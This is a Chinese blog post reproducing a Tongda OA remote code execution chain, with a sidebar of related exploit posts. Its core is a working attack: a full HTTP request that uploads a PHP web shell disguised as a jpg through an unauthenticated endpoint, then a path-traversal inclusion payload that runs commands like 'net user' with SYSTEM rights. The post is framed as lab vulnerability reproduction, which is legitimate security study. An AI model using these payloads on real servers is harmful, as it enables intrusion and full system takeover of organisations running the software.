漏洞复现系列--通达OA未授权上传+文件包含RCE

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40007043/article/details/105011830
版权

一、漏洞情况
此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞
文件上传地址:
http://localhost:8083/ispirit/im/upload.php
本地文件包含地址:
http://localhost:8083/ispirit/interface/gateway.php
这个地址我看有的复现地址不一样,是/mac/gateway.php,可能和操作系统有关,需要注意下

二、漏洞影响版本
tongdaOA V11
tangdaOA 2017
tangdaOA 2016
tangdaOA 2015
tangdaOA 2013 增强版
tangdaOA 2013

三、漏洞验证
1、通达OA下载安装
下载地址:
http://www.tongda2000.com/download/down.php?VERSION=2019&code=86d3V9EzrapwAKhPkxfbNZDsfB48gbFvbS0QYsUr%2FnNWNP2e5Fn%2F&F=baidu_natural&K=
安装过程:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2、上传图片马
在这里插入图片描述

POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1:8083
Content-Length: 656
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

3、利用本地文件包含漏洞去执行刚刚上传的木马
文件包含地址:http://127.0.0.1:8083/ispirit/interface/gateway.php
POST数据:

json={"url":"/general/../../attach/im/2003/1522036437.jpg"}&cmd=net user

在这里插入图片描述
在这里插入图片描述
从上图可以看到,命令执行成功,并且权限是system权限

梦之履行地
关注
专栏目录
通达OA inc/package/down.php接口授权访问漏洞复现 [附POC]
薛定谔嘚喵博客
11-29 1476
通达OA 接口inc/package/down.php存在授权访问漏洞,该漏洞源于系统对用户传入的数据过滤不严。攻击者可借助特制的HTTP请求利用该漏洞访问敏感文件,造成信息泄露。
通达OA漏洞分析合集
不忘初心,护天下安全!
06-21 4249
通达OA是一套使用比较广泛的办公系统。随着国家护网的开展,通达OA成为渗透人员优先尝试的目标,暴露出了大量漏洞,以下进行介绍。判断通达版本爆破用户、邮箱GET 参数可获取username、email获得计算机名 通达OA v2014 app="TDXK-通达OA" app="TDXK-通达OA" && (title="2013" || title="2015")通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏
RCEphp文件上传
最新发布
m0_71332744的博客
07-30 957
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
通达OA_文件包含漏洞
黑剑
09-08 924
复现靶场:通达2017版漏洞文件:td\webroot\ispirit\interface\gateway.php漏洞地址: /mac/gateway.php漏洞POC:json={“url”:“/general/…/…/mysql5/my.ini”}
通达OA授权上传文件包含RCE
BROTHERYY的博客
08-20 751
一、漏洞情况 此漏洞是由授权上传和本地文件包含两个漏洞组合而形成的rce漏洞 文件上传地址: http://localhost:80/ispirit/im/upload.php 本地文件包含地址: http://localhost:80/ispirit/interface/gateway.php 需要复现的朋友私信我,我分享链接给你 安装很简单,一路next就OK。 登录账号是:admin,密码为空。 登录以后,抓取任意数据包,将数据包修改为下面的数据 POST /ispirit/im/upload.ph
通达OA11.4漏洞复现授权访问)
weixin_51716781的博客
05-10 1501
通达OA11.4漏洞复现授权访问) 本文章仅限于渗透测试使用,如出问题与作者无关,请不要做违法操作 1:在虚拟机上安装通达OA11.4版本,查看虚拟机ip 192.168.78.159 2:访问ispirit/login_code.php 获取codeuid 如图:记住UID后面使用 3:访问/logincheck_code.php文件并使用bp抓包 4:在bp中需要修改数据:2个地方:1:修改为POST包,添加UID(注意事项:返回的包中status返回是1则成功,如果是0则失败) 5:把获取的
来源oa_全网首发 | 通达OA多枚0day漏洞分享
weixin_36156209的博客
01-12 799
文章来源:安译Sec之前曝光过通达OA 0day我这里就不曝了,截止到发帖时,下面的漏洞都是正式公开的。影响范围:我测试的是通达OA11.5版本,也就是2020年04月17日发布的,其他版测,但我想也会有吧。HW这几天看到大家对通达OA的热情度很高,正好今天有空,下载了一个通达OA 11.5版本下来做代码审计,通达OA的代码是加密的,所以需要一个SeayDzend工具解密,百度上就...
通达OA任意文件删除+任意文件上传RCE漏洞复现
玄道的网安博客
11-30 1403
漏洞概述 通达OA是一套国内常用的办公系统,在V11.X<V11.5和通达OA 2017版本中存在任意用户登录漏洞。攻击者在远程且授权的情况下,通过此漏洞可以以任意用户身份登录到系统(包括系统管理员)。 影响版本 通达OAv11.6版本 环境搭建 下载地址 https://pan.baidu.com/s/1VqUUNUsgsssK1Mhq2r8HHQ 提取码:him4 一键默认安装 端口配置 服务器配置 接着访问http:...
通达oa wbupload.php,通达OA授权文件上传&任意文件包含导致RCE分析
weixin_33330762的博客
03-11 604
影响范围V11.3版2017版2016版2015版2013版2013增强版漏洞简介通过授权访问进入上传上传图片马,使用任意文件包含getshell漏洞分析授权访问文件上传漏洞点位于/ispirit/im/upload.php,首先看到如下代码$P = $_POST["P"];if (isset($P) || ($P != "")) {ob_start();include_once "inc/...
通达OA RCE分析及复现
blue_fantasy的博客
01-10 1317
Text. ▶漏洞描述 通达OA是北京通达信科科技有限公司出品的 "Office Anywhere通达网络智能办公系统"。 3月13日,通达OA在官方论坛发布通告称,近日接到用户反馈遭到勒索病毒攻击,提示用户注意安全风险,并且于同一天对所有版本发布了加固补丁。 在受影响的版本中,攻击者可以在认证的情况下向服务器上传jpg图片文件,然后包含该文件,造成远程代码执行。该漏洞无需登录即可触发。 ▶漏洞影响版本 V11版 2017版 2016版 2015版 2013增.
漏洞复现-通达TongdaOA系列
aming小老弟
10-03 4398
通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台2015年,通达OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑。
通达OA前台RCE加EXP任意文件上传+文件包含.py
03-18
通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含通达OA前台RCE加EXP任意文件上传+文件包含 通达OA前台RCE加EXP任意文件上传+文件包含
漏洞实例_通达OA远程命令执行漏洞分析_零基础黑客入门教程
程序员六七的博客
06-26 1213
一、漏洞简介通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达OA后台 update文件包含漏洞
xiaokp7的博客
08-03 420
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA v11.8以下存在文件上传接口,可上传 .user.ini 文件包含PHP语句的文件导致命令执行。
漏洞复现-通达OA通达OA share身份认证绕过漏洞
xiaokp7的博客
02-18 632
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
【新】通达OA前台反序列化漏洞分析
C20220511的博客
08-07 2154
通达OA作为历史上出现漏洞较多的OA,在经过多轮的迭代之后已经很少前台的RCE漏洞了。对应12系列做过多测试,本文提到的所有漏洞在最新版的通达12.4中已修复,使用此漏洞造成的任何攻击影响均与本文作者无关。在上面的方法中会对传入的Cookie值进行签名校验,校验的方法是validateData,其中$this->cookieValidationKey是签名的key。继续跟踪loadCookies方法,在这个方法中会调用unserialize方法对传入的Cookie的值进行反序列化。
通达OA前台任意用户登录漏洞复现
m0_64769218的博客
09-17 808
通达OA是一套国内常用的办公系统,在V11.X
Redis授权访问漏洞
qq_45434762的博客
03-08 176
主机信息reids-server:192.168.254.132kali:192.168.254.135redis-cliredis-cli是redis命令行工具./redis-cli -...
通达OA命令执行漏洞复现(文件上传+文件包含)
谢公子的博客
03-22 4404
漏洞描述 通达OA是北京通达信科科技有限公司出品的“Office Anywhere通达网络智能办公系统”。在受影响的版本中,攻击者可以在认证的情况下向服务器上传文件。在特定版本中,还可以造成上传文件中的代码执行。该漏洞无需登录/用户交互即可触发。 漏洞等级 高危 漏洞影响版本 V11版 2017版 2016版 2015版 2013增强版 2013版 修复建议 版本 ...
通达OA文件上传文件包含漏洞引发的RCE分析
"通达OA任意文件上传配合文件包含导致的RCE影响多个版本,包括V11版、2015-2017版、2013版以及2013增强版。利用该漏洞,攻击者可以通过Python等脚本执行命令,如`python3.pyhttp://10.0.0.1:81whoami`,获取服务器...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值